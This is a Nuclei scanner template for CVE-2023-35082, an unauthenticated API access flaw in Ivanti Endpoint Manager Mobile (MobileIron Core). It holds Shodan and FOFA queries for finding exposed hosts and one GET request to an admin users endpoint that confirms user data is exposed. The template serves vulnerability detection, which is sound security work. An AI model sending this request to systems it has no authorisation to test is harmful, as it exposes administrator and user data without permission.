nuclei-templates/http/cves/2023/CVE-2023-35082.yaml

50 lines
2.1 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-35082
info:
name: MobileIron Core - Remote Unauthenticated API Access
author: DhiyaneshDk
severity: critical
description: |
Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web applications security filter chain.
impact: |
Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions.
remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
reference:
- https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
- https://nvd.nist.gov/vuln/detail/CVE-2023-35082
- https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
- https://github.com/Chocapikk/CVE-2023-35082
- https://github.com/Ostorlab/KEV
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-35082
cwe-id: CWE-287
epss-score: 0.96732
epss-percentile: 0.9966
cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ivanti
product: endpoint_manager_mobile
shodan-query:
- http.favicon.hash:362091310
- http.favicon.hash:"362091310"
fofa-query: icon_hash="362091310"
tags: cve2023,cve,ivanti,mobileiron,epmm,kev
http:
- method: GET
path:
- "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"
max-size: 100
matchers:
- type: dsl
dsl:
- contains_all(body, 'results','userId','name')
- contains(header, 'application/json')
- status_code == 200
condition: and
# digest: 4a0a00473045022100b4843883fe2485c515a79c00d17ea62c065bd50025c2c4c7a243d434d65daf1802207835fc7e73d18f106d16c31391ba326357df94fc9b3ebbea01335a66535e1f8a:922c64590222798bb761d5b6d8e72950